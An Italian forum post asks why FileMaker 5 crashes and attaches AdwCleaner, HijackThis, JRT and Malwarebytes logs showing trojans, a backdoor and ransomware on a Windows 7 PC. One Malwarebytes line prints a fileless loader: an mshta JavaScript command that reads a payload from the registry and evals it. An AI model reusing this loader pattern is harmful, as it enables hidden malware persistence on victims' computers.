Ho preso da altri post quello che poterbbe essere necessario.
Innanzi tutto espongo il mio problema. Da ieri sera il programma FileMaker 5 non funziona nel senso che dopo qualche secondo dalla sua esecuzione mi dice che ha smesso di funzionare e si chiude.
Allego i vari log:
# AdwCleaner v6.041 - Creato file registro eventi 25/12/2016 in 12:51:51
# Aggiornato su 16/12/2016 da Malwarebytes
# Database : 2016-12-23.1 [Server]
# Sistema operativo : Windows 7 Ultimate Service Pack 1 (X86)
# Utente : Tasca Pane - TASCAPANE-PC
# In esecuzione da : C:\Users\Tasca Pane\Desktop\VIRUS\adwcleaner_6.041.exe
# Modo: pulizia
# Supporto :
https://www.malwarebytes.com/support***** [ Servizi ] *****
***** [ Cartelle ] *****
[-] Cartella eliminata: C:\ProgramData\Auslogics
[#] Cartella eliminata al riavvio: C:\ProgramData\Application Data\Auslogics
[-] Cartella eliminata: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics
[-] Cartella eliminata: C:\Program Files\Auslogics
***** [ File ] *****
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Collegamenti ] *****
***** [ Attività pianificate ] *****
***** [ Registro ] *****
[-] Chiave eliminata: HKLM\SOFTWARE\Auslogics
[-] Valore eliminato: HKU\S-1-5-21-1227608380-2347549918-51477129-1000\Software\Microsoft\Windows\CurrentVersion\Run [BrowserMe]
[#] Valore eliminato al riavvio: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [BrowserMe]
***** [ Browser ] *****
[-] Preferenze Firefiox azzerate: "browser.search.hiddenOneOffs" - "Amazon.it,Bing,DuckDuckGo,Hoepli,Trovi,Wikipedia (it),Yahoo"
*************************
:: " tracciamento " chiavi eliminate
:: Impostazioni Winsock ripristinate
*************************
C:\AdwCleaner\AdwCleaner[C11].txt - [5303 Byte] - [29/08/2016 14:57:56]
C:\AdwCleaner\AdwCleaner[C12].txt - [4132 Byte] - [06/10/2016 20:02:12]
C:\AdwCleaner\AdwCleaner[C13].txt - [1650 Byte] - [25/12/2016 12:51:51]
C:\AdwCleaner\AdwCleaner[C1].txt - [5534 Byte] - [15/02/2016 23:36:32]
C:\AdwCleaner\AdwCleaner[C25].txt - [6097 Byte] - [12/10/2015 22:41:54]
C:\AdwCleaner\AdwCleaner[C26].txt - [4277 Byte] - [13/11/2015 21:10:39]
C:\AdwCleaner\AdwCleaner[C27].txt - [4790 Byte] - [22/11/2015 21:45:33]
C:\AdwCleaner\AdwCleaner[C28].txt - [1510 Byte] - [29/11/2015 15:10:56]
C:\AdwCleaner\AdwCleaner[C29].txt - [1881 Byte] - [07/12/2015 14:41:15]
C:\AdwCleaner\AdwCleaner[C2].txt - [8981 Byte] - [05/03/2016 14:10:24]
C:\AdwCleaner\AdwCleaner[C30].txt - [1629 Byte] - [16/12/2015 00:58:10]
C:\AdwCleaner\AdwCleaner[C3].txt - [7628 Byte] - [05/03/2016 18:35:49]
C:\AdwCleaner\AdwCleaner[C4].txt - [4662 Byte] - [25/06/2016 18:51:25]
C:\AdwCleaner\AdwCleaner[R21].txt - [1201 Byte] - [21/05/2015 22:01:05]
C:\AdwCleaner\AdwCleaner[R22].txt - [1257 Byte] - [06/07/2015 22:30:33]
C:\AdwCleaner\AdwCleaner[R23].txt - [1337 Byte] - [30/07/2015 16:30:35]
C:\AdwCleaner\AdwCleaner[S14].txt - [5252 Byte] - [29/08/2016 14:55:38]
C:\AdwCleaner\AdwCleaner[S15].txt - [5475 Byte] - [29/08/2016 14:57:41]
C:\AdwCleaner\AdwCleaner[S16].txt - [4476 Byte] - [06/10/2016 20:01:56]
C:\AdwCleaner\AdwCleaner[S17].txt - [4172 Byte] - [25/12/2016 12:51:29]
C:\AdwCleaner\AdwCleaner[S1].txt - [5553 Byte] - [15/02/2016 23:33:59]
C:\AdwCleaner\AdwCleaner[S20].txt - [1269 Byte] - [21/05/2015 22:02:37]
C:\AdwCleaner\AdwCleaner[S21].txt - [1323 Byte] - [06/07/2015 22:31:29]
C:\AdwCleaner\AdwCleaner[S22].txt - [1403 Byte] - [30/07/2015 16:31:48]
C:\AdwCleaner\AdwCleaner[S26].txt - [5678 Byte] - [12/10/2015 22:40:27]
C:\AdwCleaner\AdwCleaner[S27].txt - [3951 Byte] - [13/11/2015 21:09:24]
C:\AdwCleaner\AdwCleaner[S28].txt - [5344 Byte] - [22/11/2015 21:44:16]
C:\AdwCleaner\AdwCleaner[S29].txt - [1376 Byte] - [29/11/2015 15:05:55]
C:\AdwCleaner\AdwCleaner[S2].txt - [8734 Byte] - [05/03/2016 14:08:21]
C:\AdwCleaner\AdwCleaner[S30].txt - [1749 Byte] - [07/12/2015 14:39:48]
C:\AdwCleaner\AdwCleaner[S31].txt - [1665 Byte] - [16/12/2015 00:02:12]
C:\AdwCleaner\AdwCleaner[S3].txt - [4957 Byte] - [05/03/2016 18:32:10]
C:\AdwCleaner\AdwCleaner[S4].txt - [3139 Byte] - [01/06/2016 09:56:12]
C:\AdwCleaner\AdwCleaner[S5].txt - [5921 Byte] - [25/06/2016 18:49:55]
########## EOF - C:\AdwCleaner\AdwCleaner[C13].txt - [3977 Byte] ##########
Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 12:11:26, on 25/12/2016
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18538)
FIREFOX: 50.1.0 (x86 it)
Boot mode: Normal
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskhost.exe
C:\Windows\Explorer.EXE
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
C:\Program Files\AMD Quick Stream\AppexAcceleratorUI.exe
C:\Program Files\InfoCert\DiKe 6\dike.exe
C:\Program Files\PDFCreator\PDFCreator.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\regsvr32.exe
C:\Windows\system32\regsvr32.exe
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\OpenOffice 4\program\swriter.exe
C:\Program Files\OpenOffice 4\program\soffice.exe
C:\Program Files\OpenOffice 4\program\soffice.bin
C:\Users\Tasca Pane\Desktop\Programmi Officina\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer,(Default) = d8b34ea5ca3b11e6b6bb08606e698e27
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_66\bin\ssv.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Adobe Acrobat Create PDF Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_66\bin\jp2ssv.dll
O2 - BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll
O4 - HKLM\..\Run: [MSC] "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
O4 - HKLM\..\Run: [Wondershare Helper Compact.exe] C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
O4 - HKLM\..\RunOnce: [GrpConv] grpconv.exe -o
O4 - HKCU\..\Run: [AppEx Accelerator UI] C:\Program Files\AMD Quick Stream\AppexAcceleratorUI.exe -h
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
O4 - HKCU\..\Run: [BrowserMe] C:\Users\Tasca Pane\AppData\Roaming\BrowserMe\ChromeUpdate.exe
O4 - HKCU\..\Run: [] "C:\Users\Tasca Pane\AppData\Local\30c530fa\5a6f2236.bat"
O4 - HKCU\..\Run: [Dike 6] "C:\Program Files\InfoCert\DiKe 6\dike.exe" -o NO_SHELL -f "NO_MAIN_WIN"
O4 - HKUS\S-1-5-21-1227608380-2347549918-51477129-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [AppEx Accelerator UI] C:\Program Files\AMD Quick Stream\AppexAcceleratorUI.exe -h (User '?')
O4 - HKUS\S-1-5-21-1227608380-2347549918-51477129-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR (User '?')
O4 - HKUS\S-1-5-21-1227608380-2347549918-51477129-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [BrowserMe] C:\Users\Tasca Pane\AppData\Roaming\BrowserMe\ChromeUpdate.exe (User '?')
O4 - HKUS\S-1-5-21-1227608380-2347549918-51477129-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [] "C:\Users\Tasca Pane\AppData\Local\30c530fa\5a6f2236.bat" (User '?')
O4 - HKUS\S-1-5-21-1227608380-2347549918-51477129-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [Dike 6] "C:\Program Files\InfoCert\DiKe 6\dike.exe" -o NO_SHELL -f "NO_MAIN_WIN" (User '?')
O4 - Global Startup: PDFCreator.lnk = C:\Program Files\PDFCreator\PDFCreator.exe
O8 - Extra context menu item: Aggiungi a PDF esistente - res://C:\Program Files\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Aggiungi destinazione link a PDF esistente - res://C:\Program Files\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Converti destinazione link in Adobe PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Converti in Adobe PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&sporta in Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: I&nvia a OneNote - res://C:\PROGRA~1\MICROS~3\Office14\ONBttnIE.dll/105
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) -
http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cabO17 - HKLM\System\CCS\Services\Tcpip\..\{A09F903F-7B42-4F16-9B5B-5F0699F6B1B2}: NameServer = 8.8.8.8,8.8.4.4
O17 - HKLM\System\CS1\Services\Tcpip\..\{A09F903F-7B42-4F16-9B5B-5F0699F6B1B2}: NameServer = 8.8.8.8,8.8.4.4
O17 - HKLM\System\CS2\Services\Tcpip\..\{A09F903F-7B42-4F16-9B5B-5F0699F6B1B2}: NameServer = 8.8.8.8,8.8.4.4
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: AMD External Events Utility - AMD - C:\Windows\system32\atiesrxx.exe
O23 - Service: AMD FUEL Service - Advanced Micro Devices, Inc. - C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: CodeMeter Runtime Server (CodeMeter.exe) - WIBU-SYSTEMS AG - C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe
O23 - Service: FABS - Helping agent for MAGIX media database (Fabs) - MAGIX AG - C:\Program Files\Common Files\MAGIX Services\Database\bin\FABS.exe
O23 - Service: Firebird Guardian - DefaultInstance (FirebirdGuardianDefaultInstance) - Firebird Project - C:\Program Files\Firebird\Firebird_2_5\bin\fbguard.exe
O23 - Service: Firebird Server - DefaultInstance (FirebirdServerDefaultInstance) - Firebird Project - C:\Program Files\Firebird\Firebird_2_5\bin\fbserver.exe
O23 - Service: Firebird Server - MAGIX Instance (FirebirdServerMAGIXInstance) - MAGIX® - C:\Program Files\Common Files\MAGIX Services\Database\bin\fbserver.exe
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: FreemakeVideoCapture - Ellora Assets Corp. - C:\Program Files\Freemake\CaptureLib\CaptureLibService.exe
O23 - Service: Servizio Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Servizio Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: LiveUpdate (LiveUpdateSvc) - IObit - C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: Macrium Reflect Image Mounting Service (ReflectService.exe) - Paramount Software UK Ltd - C:\Program Files\Macrium\Reflect\ReflectService.exe
--
End of file - 8162 bytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.0 (12.05.2016)
Operating System: Windows 7 Ultimate x86
Ran by Tasca Pane (Administrator) on 25/12/2016 at 12:59:25,64
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File System: 18
Successfully deleted: C:\Users\Tasca Pane\AppData\Roaming\Mozilla\Firefox\Profiles\a19psdmy.default-1407917780895\extensions\staged (Folder)
Successfully deleted: C:\Users\Tasca Pane\AppData\Roaming\productdata (Folder)
Successfully deleted: C:\Users\Tasca Pane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0IMB0K7N (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Tasca Pane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\76MORGF3 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Tasca Pane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LU18UJUR (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Tasca Pane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MDA3R9AC (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Tasca Pane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T3K0F7HD (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Tasca Pane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VD6GYBL3 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Tasca Pane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y9OSANGH (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Tasca Pane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YNRDWAMN (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0IMB0K7N (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\76MORGF3 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LU18UJUR (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MDA3R9AC (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T3K0F7HD (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VD6GYBL3 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y9OSANGH (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YNRDWAMN (Temporary Internet Files Folder)
Registry: 1
Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 25/12/2016 at 13:02:04,59
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Malwarebytes Anti-Malware
www.malwarebytes.orgData scansione: 25/12/2016
Ora scansione: 11:26
File di log: Log di M.txt
Amministratore: Sì
Versione: 2.2.1.1043
Database malware: v2016.12.25.04
Database rootkit: v2016.11.20.01
Licenza: Gratuito
Protezione da malware: Disattivata
Protezione da siti web nocivi: Disattivata
Auto-protezione: Disattivata
SO: Windows 7 Service Pack 1
CPU: x86
File system: NTFS
Utente: Tasca Pane
Tipo di scansione: Ricerca elementi nocivi
Risultati: Completata
Elementi analizzati: 329620
Tempo impiegato: 1 ore, 4 min, 40 sec
Memoria: Attivata
Esecuzioni automatiche: Attivata
File system: Attivata
Archivi compressi: Attivata
Rootkit: Attivata
Euristiche: Attivata
PUP: Attivata
PUM: Attivata
Processi: 0
(Nessun elemento nocivo rilevato)
Moduli: 0
(Nessun elemento nocivo rilevato)
Chiavi di registro: 3
PUP.Optional.AuslogicsDiskDefrag, HKLM\SOFTWARE\AUSLOGICS\Disk Defrag, , [0781fdee8713092d6bdbdcd05da3fc04],
PUP.Optional.AuslogicsDiskDefrag, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1, , [850326c5247657dfbe714567a06027d9],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-1227608380-2347549918-51477129-1000_Classes\AEB0676E\SHELL\OPEN\COMMAND, , [a4e44e9ddebc3105bc82b0de10f3a15f],
Valori di registro: 4
Trojan.Agent, HKU\S-1-5-21-1227608380-2347549918-51477129-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|BrowserMe, C:\Users\Tasca Pane\AppData\Roaming\BrowserMe\ChromeUpdate.exe, , [f0988d5e2278f44268accfa88a79e41c]
Trojan.Fileless.MTGen, HKU\S-1-5-21-1227608380-2347549918-51477129-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^mzbx, , [f98f806b42587cba09290383e21ed828],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-1227608380-2347549918-51477129-1000_Classes\aeb0676e\SHELL\OPEN\COMMAND, "C:\Windows\system32\mshta.exe" "javascript:wkyS07xf="uWk2VH";sN20=new ActiveXObject("WScript.Shell");dZknFQ8="eLx2f";wbe72W=sN20.RegRead("HKCU\\software\\xtcsefvr\\zpkjhhvwz");KftW48JJF="uN";eval(wbe72W);d6NviJp8="RGuDN";", , [a4e44e9ddebc3105bc82b0de10f3a15f]
Trojan.Fileless.MTGen, HKU\S-1-5-21-1227608380-2347549918-51477129-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^mzbx, , [1d6b2ac1e9b15adca6c2a0e8cf31926e],
Dati di registro: 0
(Nessun elemento nocivo rilevato)
Cartelle: 15
Trojan.BrowserMe.E, C:\Users\Tasca Pane\AppData\Roaming\BrowserMe, , [236586652773d75f01499b02cf3126da],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Data, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Lang, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Setup, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Auslogics\Disk Defrag, , [ef99effcedad57df0341e1cbba46c53b],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Auslogics\Disk Defrag\7.x, , [ef99effcedad57df0341e1cbba46c53b],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Auslogics\Disk Defrag\7.x\Data, , [ef99effcedad57df0341e1cbba46c53b],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Auslogics\Disk Defrag\7.x\Reports, , [ef99effcedad57df0341e1cbba46c53b],
PUP.Optional.AuslogicsDiskDefrag, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics\Disk Defrag, , [ff899d4e9ffb4ee821a607a5e41c46ba],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor, , [d2b6c2295e3ce65090e6298be81826da],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache, , [d2b6c2295e3ce65090e6298be81826da],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache, , [d2b6c2295e3ce65090e6298be81826da],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data, , [d2b6c2295e3ce65090e6298be81826da],
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\temp, , [d2b6c2295e3ce65090e6298be81826da],
File: 59
Backdoor.Andromeda, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp8F53.exe, , [ed9b559699010f27a45607b545bbcf31],
Ransom.Cerber, C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpB20F.exe, , [4345b03bbbdf270f1043c0fc3fc15fa1],
PUP.Optional.InstallCore, C:\Users\Tasca Pane\Desktop\Canone\FreemakeVideoConverterSetup.exe, , [77118a613e5cfc3a2b15afaeee129868],
PUP.Optional.AuslogicsDiskDefrag, C:\Users\Tasca Pane\Desktop\Canone\AUSLOGIC-setup.exe, , [5830856602980531be2dc4ce5ca40000],
Trojan.Agent, C:\Users\Tasca Pane\AppData\Roaming\BrowserMe\ChromeUpdate.exe, , [f0988d5e2278f44268accfa88a79e41c],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\AxBrowsers.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\AxComponentsRTL.bpl, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\AxComponentsVCL.bpl, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\cdefrag.exe, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\CommonForms.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\CommonForms.Routine.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\CommonForms.Site.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\DebugHelper.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\DiskCleanerHelper.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\DiskDefrag.exe, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\DiskDefragHelper.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\DiskWipeHelper.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\EULA.rtf, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\GASender.exe, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\GoogleAnalyticsHelper.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Localizer.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\ndefrg32.exe, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\RegistryCleanerHelper.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\ReportHelper.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\rtl160.bpl, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\SendDebugLog.exe, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\ShellExtension.ContextMenu.x32.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\ShellExtension.ContextMenu.x64.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\ShellExtension.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\sqlite3.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\TaskSchedulerHelper.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\unins000.dat, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\unins000.exe, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\unins000.msg, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\vcl160.bpl, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\vclimg160.bpl, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\VolumesHelper.dll, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Data\main.ini, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Lang\deu.lng, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Lang\enu.lng, , [3f49d615e7b3af871a1b78340ff1c23e],
PUP.Optional.AuslogicsDiskDefrag, C:\Program Files\Auslogics\Disk Defrag\Lang\esp.lng, , [3f49d615e7b3af871a1b78340ff1c23e],
